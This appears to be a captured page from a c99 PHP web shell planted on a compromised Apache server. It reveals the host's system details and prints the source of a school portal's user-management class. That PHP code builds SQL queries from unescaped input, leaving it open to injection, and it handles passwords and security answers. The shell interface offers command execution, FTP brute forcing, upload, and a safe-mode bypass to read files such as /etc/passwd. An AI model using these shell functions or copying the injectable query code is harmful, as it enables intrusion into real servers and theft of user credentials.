110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/teacher/class/ drwxr-xr-x Free 52.36 GB of 127.8 GB (40.97%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/teacher/class/ drwxr-xr-x
Free 52.36 GB of 127.8 GB (40.97%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: clsUmuser.php (4.18 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

c=$c->c;
	$this->DB=$c->db;
}
function Save(){
	if ($this->status==1){
		$this->UsID=$this->GetNextCode();
		$sql = "insert into umuser values(
			'$this->UsID',
			'$this->UsName',
 			'$this->UsLogin',
 			'$this->UsPassword',
 			'$this->UsPsCode',
 			'$this->UsWgID',
 			'$this->UsQsID',
 			'$this->UsAnswer',
 			'$this->UsEmail',
 			'$this->UsActive',
 			'$this->UsAdmin',
 			'$this->UsDesc',
 			'$this->UsPwdExpDt',
 			'$this->UsUpdDt',
 			'$this->UsUpdUsID',
 			'$this->UsSessionID'
			)";
	}else {
		$sql = "update umuser set 
			UsName='$this->UsName', 
			UsLogin='$this->UsLogin', 
			UsPassword='$this->UsPassword', 
			UsPsCode='$this->UsPsCode', 
			UsWgID='$this->UsWgID', 
			UsQsID='$this->UsQsID', 
			UsAnswer='$this->UsAnswer', 
			UsEmail='$this->UsEmail', 
			UsActive='$this->UsActive', 
			UsAdmin='$this->UsAdmin', 
			UsDesc='$this->UsDesc', 
			UsPwdExpDt='$this->UsPwdExpDt', 
			UsUpdDt='$this->UsUpdDt', 
			UsUpdUsID='$this->UsUpdUsID', 
			UsSessionID='$this->UsSessionID' 
			where UsID='$this->UsID' ";
	}
	return $this->Dml($sql);
}

function RSumuser(){
	$this->SetQuery("select * from umuser order by UsID");
}
function GetNextCode(){
	$this->SetQuery("select max(UsID) as num from umuser");
	if ($result=$this->GetResult()) {
		return $result['num']+1;
	}
}

function GetRecord(){
	if ($this->result = $this->GetResult()) {
		$this->UsID = $this->result['UsID'];
		$this->UsName = $this->result['UsName'];
		$this->UsLogin = $this->result['UsLogin'];
		$this->UsPassword = $this->result['UsPassword'];
		$this->UsPsCode = $this->result['UsPsCode'];
		$this->UsWgID = $this->result['UsWgID'];
		$this->UsQsID = $this->result['UsQsID'];
		$this->UsAnswer = $this->result['UsAnswer'];
		$this->UsEmail = $this->result['UsEmail'];
		$this->UsActive = $this->result['UsActive'];
		$this->UsAdmin = $this->result['UsAdmin'];
		$this->UsDesc = $this->result['UsDesc'];
		$this->UsPwdExpDt = $this->result['UsPwdExpDt'];
		$this->UsUpdDt = $this->result['UsUpdDt'];
		$this->UsUpdUsID = $this->result['UsUpdUsID'];
		$this->UsSessionID = $this->result['UsSessionID'];
		return 1;
	}else {
		return 0;
	}
}

function SearchByKey($xKey){
	if ($this->SetQuery("select * from umuser where UsID= '$xKey'")){ 
		return 1;
	}else {
		return 0;
	}
}
function RSumuser2(){
	$this->SetQuery("select * from umuser where UsID!='1' order by UsID");
}
function SearchByUsPsCode($xKey){
	if ($this->SetQuery("select * from umuser where UsPsCode= '$xKey'")){ 
		return 1;
	}else {
		return 0;
	}
}
//****************** You can add new functions below **********************//

function JoinUsIDLimitGroupUgUsIDOrderName($xKey1, $xKey2, $xstart, $xpage_size){
	if ($this->SetQuery("select B.UsID, B.UsName, B.UsPsCode from umusergroup A,umuser B where A.UgUsID = B.UsID and A.UgGpID >= '$xKey1' and  A.UgGPID <= '$xKey2' group by A.UgUsID order by B.UsName limit $xstart, $xpage_size")){
		return 1;
	}else {
		return 0;
	}
}

function SarchByUsNameJoinUsIDNameGroupUgUsIDOrderName($xKey1, $xKey2, $xKey3){
	if ($this->SetQuery("select B.UsID, B.UsName, B.UsPsCode from umusergroup A,umuser B where A.UgUsID = B.UsID and A.UgGpID >= '$xKey1' and  A.UgGPID <= '$xKey2' and B.UsName like '%$xKey3%'  group by A.UgUsID order by B.UsName")){
		return 1;
	}else {
		return 0;
	}
}
function SarchByn($xKey1){
	if ($this->SetQuery("select B.UsID, B.UsName, B.UsPsCode from umusergroup A,umuser B where A.UgUsID = '$xKey1'")){
		return 1;
	}else {
		return 0;
	}
}
function SearchByUsLogin($xKey){
//--¤й№ЛТўйНБЩЕµТБ PK µйН§ГРєШѕТГТБФаµНГмґйЗВ бЕРµйН§µТБґйЗВаБёНґ GetRecord() аКБН
	if ($this->SetQuery("select * from umuser where UsLogin= '$xKey'")){ 
		return 1;
	}else {
		return 0;
	}
}
function SearchUsIDByUsPsCode($xKey1,$dbname){
	if ($this->SetQuery("select UsID from $dbname.umuser where UsPsCode = '$xKey1'")){
		return 1;
	}else {
		return 0;
	}
}
} //--End class umuser--

?>
bool(false)

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0061 ]--